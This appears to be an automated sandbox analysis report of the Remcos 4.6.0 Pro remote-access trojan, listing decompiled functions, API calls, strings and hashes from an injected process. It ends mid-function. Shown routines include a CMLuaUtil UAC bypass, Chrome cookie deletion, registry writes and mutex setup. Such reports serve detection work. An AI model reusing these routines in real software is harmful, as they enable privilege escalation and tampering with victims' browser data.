                    Uniqueness Score: -1.00%

                    Function 00438C57 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E00438C57(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46f090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E004376D8(__eflags,  *0x46f090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00437712(__eflags,  *0x46f090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E004443F4(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00437712(__eflags,  *0x46f090, 0);
								} else {
									__eflags = E00437712(__eflags,  *0x46f090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00445002(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}








                    0x00438c5e
                    0x00438c71
                    0x00438c78
                    0x00438c7b
                    0x00438c7e
                    0x00438c97
                    0x00438c97
                    0x00438c80
                    0x00438c80
                    0x00438c82
                    0x00438c8c
                    0x00438c92
                    0x00438c93
                    0x00438c95
                    0x00438ca5
                    0x00438ca9
                    0x00438cab
                    0x00438cbf
                    0x00438cbf
                    0x00438cc8
                    0x00438cad
                    0x00438cbb
                    0x00438cbd
                    0x00438cd1
                    0x00438cd3
                    0x00438cd3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00438cbd
                    0x00438cd6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00438c95
                    0x00438c82
                    0x00438cde
                    0x00438ce8
                    0x00438c60
                    0x00438c62
                    0x00438c62

                    APIs
                    • GetLastError.KERNEL32(?,?,00438C4E,00437B8E), ref: 00438C65
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438C73
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00438C8C
                    • SetLastError.KERNEL32(00000000,?,00438C4E,00437B8E), ref: 00438CDE
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: 06d2b6d0d256db09040b2198e32479e012de82d5718a97fd6b90c10f44b40caa
                    • Instruction ID: 21f9491cf859890c7eadaa784ea30681ac294a37727d4d336c6cdb78a7d4fc19
                    • Opcode Fuzzy Hash: 06d2b6d0d256db09040b2198e32479e012de82d5718a97fd6b90c10f44b40caa
                    • Instruction Fuzzy Hash: 7001F73220E7126FE6242B797C86A2B6744DB09779F20323FF624456E2FF594C09726D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406C24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406C44
                      • Part of subcall function 00406B71: _wcslen.LIBCMT ref: 00406B95
                      • Part of subcall function 00406B71: CoGetObject.OLE32(?,00000024,004644E0,00000000), ref: 00406BF6
                    • CoUninitialize.OLE32 ref: 00406C9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitializeObjectUninitialize_wcslen
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                    • API String ID: 3851391207-1062857032
                    • Opcode ID: 21c6875a4e00bf3e9cd9c84db11fc7adaedb877f72474f7b3962a236dd4ca43a
                    • Instruction ID: 4a2b0e9ada28304c15679dea14e35c8bbb0126878905a56f40071f2f2dcd1631
                    • Opcode Fuzzy Hash: 21c6875a4e00bf3e9cd9c84db11fc7adaedb877f72474f7b3962a236dd4ca43a
                    • Instruction Fuzzy Hash: 5D01C0723093116FF7246B52EC0AF3B7798DB8176AF16013FF946A61C1EAB9EC004169
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B01B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E0040B01B(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t32;
				void* _t33;
				void* _t34;

				_t37 = __eflags;
				_t32 = __edi;
				_t31 = E00402073(_t20,  &_v52, __edx, _t33, E0043A9AA(_t20, __eflags, "UserProfile"));
				E00408832(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				E00401FB8();
				if(DeleteFileA(E00401F8B( &_v28)) != 0) {
					_t28 = _t34 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t34 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00402073(_t20, _t28, _t31, _t33);
						E0040B752(_t20, _t31, _t33, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				E00401FB8();
				return _t21;
			}














                    0x0040b01b
                    0x0040b01b
                    0x0040b03b
                    0x0040b040
                    0x0040b049
                    0x0040b05f
                    0x0040b085
                    0x0040b087
                    0x00000000
                    0x0040b061
                    0x0040b068
                    0x0040b06b
                    0x0040b079
                    0x0040b07b
                    0x0040b08c
                    0x0040b08c
                    0x0040b091
                    0x0040b096
                    0x0040b072
                    0x0040b072
                    0x0040b072
                    0x0040b06b
                    0x0040b09e
                    0x0040b0a9

                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B057
                    • GetLastError.KERNEL32 ref: 0040B061
                    Strings
                    • [Chrome Cookies found, cleared!], xrefs: 0040B087
                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B022
                    • UserProfile, xrefs: 0040B027
                    • [Chrome Cookies not found], xrefs: 0040B07B
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    • API String ID: 2018770650-304995407
                    • Opcode ID: ccdb3e1c20e372875c48605d81a56ec54d8c08013769e4607f37cdedbea4537f
                    • Instruction ID: f9fbcf48e46e0b37629b78e1018d25b522eb7a253e11c313dbfba25adce049df
                    • Opcode Fuzzy Hash: ccdb3e1c20e372875c48605d81a56ec54d8c08013769e4607f37cdedbea4537f
                    • Instruction Fuzzy Hash: FE01F271AC410666CA0476B5DD5BCBFBB28E951308B40027FF842721E2FF7A490586CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041B6A6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 70%
                    			E0041B6A6(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				char _v104;
				struct HWND__* _t7;
				void* _t24;
				void* _t28;

				_t28 = __edi;
				_t26 = __ecx;
				_t24 = __ecx;
				AllocConsole();
				_t7 =  *0x472b0c(__ebx);
				_t32 = _t24;
				 *0x472b10 = _t7;
				if(_t24 == 0) {
					ShowWindow(_t7, 0);
				}
				E004404F2(_t26, "CONOUT$", "a", E0043AA88(1));
				SetConsoleOutputCP(0x4e4);
				E0041B663();
				E00435760(_t28,  &_v104, 0, 0x64);
				E00440830( &_v104, "\n\tRemcos v");
				E00440830( &_v104, "4.6.0 Pro");
				E00440830( &_v104, 0x46ae58);
				_push( &_v104);
				return E00406874(_t32);
			}







                    0x0041b6a6
                    0x0041b6a6
                    0x0041b6ad
                    0x0041b6af
                    0x0041b6b5
                    0x0041b6bb
                    0x0041b6bd
                    0x0041b6c3
                    0x0041b6c8
                    0x0041b6c8
                    0x0041b6e0
                    0x0041b6ed
                    0x0041b6f3
                    0x0041b700
                    0x0041b70e
                    0x0041b71c
                    0x0041b72a
                    0x0041b732
                    0x0041b73e

                    APIs
                    • AllocConsole.KERNEL32(00000000), ref: 0041B6AF
                    • ShowWindow.USER32(00000000,00000000), ref: 0041B6C8
                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041B6ED
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AllocOutputShowWindow
                    • String ID: Remcos v$4.6.0 Pro$CONOUT$
                    • API String ID: 2425139147-579393372
                    • Opcode ID: 9fa98f7035d97c5e21b7ac84947d6802447a46aa1252a65f1097801335382c61
                    • Instruction ID: db7634a49a328e0f99b2c2d62409033857a76ccc0adaf027dd828388b15aa78f
                    • Opcode Fuzzy Hash: 9fa98f7035d97c5e21b7ac84947d6802447a46aa1252a65f1097801335382c61
                    • Instruction Fuzzy Hash: B1012171A903086BE600FBB19D4BF9D33ACAB14705F501427B604A7192EABD9924CA6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004068D4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004068D4(void* __esi) {
				int _t5;
				void* _t7;
				void* _t8;
				void* _t13;
				void* _t20;

				_t20 =  *0x46f9d0 - 1; // 0x1
				if(_t20 != 0) {
					__eflags =  *0x46f9d0 - 1;
					if(__eflags != 0) {
						CloseHandle( *0x470d44);
						__eflags = E00406E2B(__eflags);
						if(__eflags == 0) {
							_t13 = 0x470b38;
						} else {
							_t13 = E00401EE4(0x473220);
						}
						_t5 = E00406CE1(_t13, 0x46a8f0, __eflags);
						__eflags = _t5;
						if(_t5 == 0) {
							ExitProcess(_t5);
						}
						_t7 = CreateMutexA(0, 1, E00401F8B(0x473268));
						 *0x470d44 = _t7;
						_t8 = 2;
						return _t8;
					} else {
						__eflags = 1;
						return 1;
					}
				} else {
					return 1;
				}
			}








                    0x004068d7
                    0x004068dd
                    0x00406cfe
                    0x00406d05
                    0x00406d12
                    0x00406d29
                    0x00406d2b
                    0x00406d38
                    0x00406d2d
                    0x00406d34
                    0x00406d34
                    0x00406d3d
                    0x00406d43
                    0x00406d45
                    0x00406d48
                    0x00406d48
                    0x00406d5d
                    0x00406d65
                    0x00406d6a
                    0x00406d6b
                    0x00406d07
                    0x00406d09
                    0x00406d0a
                    0x00406d0a
                    0x004068e3
                    0x004068e3
                    0x004068e3

                    Strings
                    • 2G, xrefs: 00406D18
                    • h2G, xrefs: 00406D4E
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, xrefs: 00406D38
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$h2G
                    • API String ID: 0-4004919476
                    • Opcode ID: 92e795556d06f7862d4405b4de2f92de10a8eb4fdc52b867a4f6e0daf799e8ad
                    • Instruction ID: 7dfc231a9bb00e149e5c0c7810f67d20ab7eac2a910a21db205252ecd238aa05
                    • Opcode Fuzzy Hash: 92e795556d06f7862d4405b4de2f92de10a8eb4fdc52b867a4f6e0daf799e8ad
                    • Instruction Fuzzy Hash: AEF0F670706311EBDB102B70AD0926A2616EB40306F01447BF84BEA2E1EB7D8852965E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412AFC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E00412AFC(void* __ecx, short* __edx, short* _a4, char _a8) {
				void* _v8;
				signed int _t16;
				char* _t18;
				long _t19;
				signed int _t21;
				signed int _t22;

				_push(__ecx);
				_push(_t21);
				_t1 =  &_v8; // 0x473220
				if(RegCreateKeyW(__ecx, __edx, _t1) != 0) {
					_t22 = 0;
				} else {
					_t16 = E0040245C();
					_t3 =  &_a8; // 0x40ed66
					_t18 = E00401EE4(_t3);
					_t7 =  &_v8; // 0x473220
					_t19 = RegSetValueExW( *_t7, _a4, 0, 1, _t18, 2 + _t16 * 2);
					RegCloseKey(_v8);
					_t22 = _t21 & 0xffffff00 | _t19 == 0x00000000;
				}
				E00401EE9();
				return _t22;
			}









                    0x00412aff
                    0x00412b00
                    0x00412b01
                    0x00412b0f
                    0x00412b4e
                    0x00412b11
                    0x00412b15
                    0x00412b1a
                    0x00412b25
                    0x00412b32
                    0x00412b35
                    0x00412b40
                    0x00412b49
                    0x00412b49
                    0x00412b53
                    0x00412b5e

                    APIs
                    • RegCreateKeyW.ADVAPI32(80000001,00000000, 2G), ref: 00412B07
                    • RegSetValueExW.ADVAPI32( 2G,?,00000000,00000001,00000000,00000000,00473238,?,0040ED66,pth_unenc,00473220), ref: 00412B35
                    • RegCloseKey.ADVAPI32(?,?,0040ED66,pth_unenc,00473220), ref: 00412B40
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: 2G$f@$pth_unenc
                    • API String ID: 1818849710-3782201451
                    • Opcode ID: 85f8060158c98b0086e305dbbba25e94d6297c9d6cf8cbc8c1938ce2977c46b4
                    • Instruction ID: 0c8d3bccce686eec099df141ad345258a3ef415a4a3ae97405fd51eab9751fc6
                    • Opcode Fuzzy Hash: 85f8060158c98b0086e305dbbba25e94d6297c9d6cf8cbc8c1938ce2977c46b4
                    • Instruction Fuzzy Hash: 1CF0C231444218BBCF009FA1ED86FEE37ACEB00754F00412AB805A61A1E6759E04DA94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004393DC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E004393DC(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = E0043EEAD();
					_t159 = 0x16;
					 *_t113 = _t159;
					E0043A5BB();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = E0043EEAD();
					_t158 = 0x16;
					 *_t111 = _t158;
					E0043A5BB();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = E0043EEAD();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				E00447E20(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = E00447655( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = E00447681( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = E004476AD( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E00441327();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = E00455EF0(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = E00455E40(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0046
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = E00455EF0(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = E00455E40(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = E00455EF0(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = E00455E40(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = E00447E71(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E00441327();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = E00447E71(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E00441327();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0043A5E8();
				asm("int3");
				_push(_t155);
				_t69 = E004412C2(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E004393DC(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}




















































                    0x004393dc
                    0x004393e5
                    0x004393ea
                    0x004393ec
                    0x004393f3
                    0x004393f4
                    0x004393f6
                    0x00000000
                    0x004393fb
                    0x004393ff
                    0x00439407
                    0x00439408
                    0x0043940a
                    0x0043940d
                    0x0043940f
                    0x00439411
                    0x00439418
                    0x00439419
                    0x0043941b
                    0x00439420
                    0x00439451
                    0x00000000
                    0x00439451
                    0x00439424
                    0x00439427
                    0x0043942a
                    0x0043942c
                    0x00439444
                    0x00439444
                    0x0043944b
                    0x0043944c
                    0x0043944e
                    0x00439450
                    0x00000000
                    0x00439450
                    0x0043942e
                    0x00439430
                    0x00000000
                    0x00000000
                    0x00439430
                    0x00439434
                    0x00439435
                    0x00439438
                    0x0043943a
                    0x00000000
                    0x00000000
                    0x0043943c
                    0x00439442
                    0x00000000
                    0x00000000
                    0x00439442
                    0x00439457
                    0x0043945f
                    0x00439463
                    0x00439466
                    0x00439469
                    0x0043946e
                    0x0043946f
                    0x00439471
                    0x0043947b
                    0x00439480
                    0x00439481
                    0x00439483
                    0x0043948d
                    0x00439492
                    0x00439493
                    0x00439495
                    0x0043949b
                    0x0043949e
                    0x004394a0
                    0x004394a2
                    0x00439523
                    0x00439523
                    0x00439524
                    0x00439525
                    0x0043952c
                    0x0043952e
                    0x00000000
                    0x00000000
                    0x00439534
                    0x0043953a
                    0x0043953b
                    0x0043953d
                    0x0043953f
                    0x0043955b
                    0x0043955b
                    0x0043955e
                    0x0043955e
                    0x0043955f
                    0x00439565
                    0x00439569
                    0x0043956e
                    0x00439570
                    0x00439572
                    0x00439577
                    0x0043957a
                    0x0043957c
                    0x0043957c
                    0x00439585
                    0x0043958c
                    0x0043958e
                    0x00439591
                    0x00439592
                    0x00439598
                    0x0043959c
                    0x004395a1
                    0x004395a4
                    0x004395a6
                    0x004395ab
                    0x004395ae
                    0x004395b1
                    0x004395b1
                    0x004395ba
                    0x004395c1
                    0x004395c3
                    0x004395c6
                    0x004395c7
                    0x004395cd
                    0x004395d1
                    0x004395d6
                    0x004395d9
                    0x004395db
                    0x004395e0
                    0x004395e3
                    0x004395e6
                    0x004395e6
                    0x004395f4
                    0x004395f6
                    0x004395f8
                    0x00439625
                    0x00439625
                    0x0043962b
                    0x00439632
                    0x00439633
                    0x00439636
                    0x00439636
                    0x00439639
                    0x0043963c
                    0x0043963e
                    0x00000000
                    0x00000000
                    0x00439643
                    0x0043964a
                    0x0043964d
                    0x00439653
                    0x00439656
                    0x00000000
                    0x004395fa
                    0x004395fa
                    0x00439600
                    0x00439600
                    0x00439607
                    0x00439608
                    0x0043960b
                    0x0043960b
                    0x0043960b
                    0x0043960e
                    0x00439611
                    0x00439611
                    0x00439611
                    0x00439611
                    0x00439614
                    0x00439614
                    0x00000000
                    0x00439614
                    0x004395fc
                    0x004395fe
                    0x0043961b
                    0x0043961d
                    0x00000000
                    0x00000000
                    0x0043961f
                    0x00000000
                    0x00000000
                    0x00439621
                    0x00439623
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00439623
                    0x00000000
                    0x004395fe
                    0x004395f8
                    0x00439541
                    0x00439542
                    0x00439548
                    0x0043954a
                    0x00000000
                    0x00000000
                    0x0043954f
                    0x00439552
                    0x00000000
                    0x00439552
                    0x004394a4
                    0x004394ae
                    0x004394b0
                    0x004394b1
                    0x004394b3
                    0x00000000
                    0x00000000
                    0x004394b5
                    0x004394bf
                    0x004394c2
                    0x004394c8
                    0x004394c9
                    0x004394cb
                    0x004394ce
                    0x004394cf
                    0x004394d2
                    0x004394d9
                    0x004394db
                    0x00000000
                    0x00000000
                    0x004394e1
                    0x004394e4
                    0x00000000
                    0x00000000
                    0x004394ea
                    0x004394eb
                    0x004394f1
                    0x004394f3
                    0x00000000
                    0x00000000
                    0x004394fc
                    0x004394fd
                    0x00439503
                    0x00439504
                    0x00439507
                    0x00439508
                    0x0043950f
                    0x00439511
                    0x00000000
                    0x00000000
                    0x00439517
                    0x00000000
                    0x00439517
                    0x004394b7
                    0x004394bd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004394bd
                    0x004394a6
                    0x004394ac
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004394ac
                    0x00439495
                    0x00439483
                    0x0043965b
                    0x0043965c
                    0x0043965d
                    0x0043965e
                    0x0043965f
                    0x00439660
                    0x00439665
                    0x0043966b
                    0x0043966c
                    0x00439671
                    0x00439673
                    0x00439675
                    0x00439677
                    0x0043967b
                    0x00439683
                    0x00439688
                    0x00439688
                    0x00000000
                    0x00439688
                    0x0043968c

                    APIs
                    • __allrem.LIBCMT ref: 00439569
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00439585
                    • __allrem.LIBCMT ref: 0043959C
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004395BA
                    • __allrem.LIBCMT ref: 004395D1
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004395EF
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: 1dddf8e515139d97c6967afe93bbf2e1bd56be1d0b4091d9d2e71436e447a3a3
                    • Instruction ID: e4b6510059702768e302587ffc0a9b2f327eb02b25cf372d85322d71f2147457
                    • Opcode Fuzzy Hash: 1dddf8e515139d97c6967afe93bbf2e1bd56be1d0b4091d9d2e71436e447a3a3
                    • Instruction Fuzzy Hash: BE815B72600B02ABE7249F79CC42B6B73A9AF58328F24552FF411D7381E7B8DD418B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404351 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 74%
                    			E00404351(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, char** _a4, signed int _a8, intOrPtr _a12) {
				char _v4;
				void* _v36;
				char _v40;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __esi;
				void* _t24;
				char** _t26;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t46;
				signed int _t55;
				signed int _t57;
				char* _t60;
				void* _t63;
				signed int _t64;
				void* _t66;
				signed int _t75;
				void* _t78;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				void* _t139;
				signed int _t140;
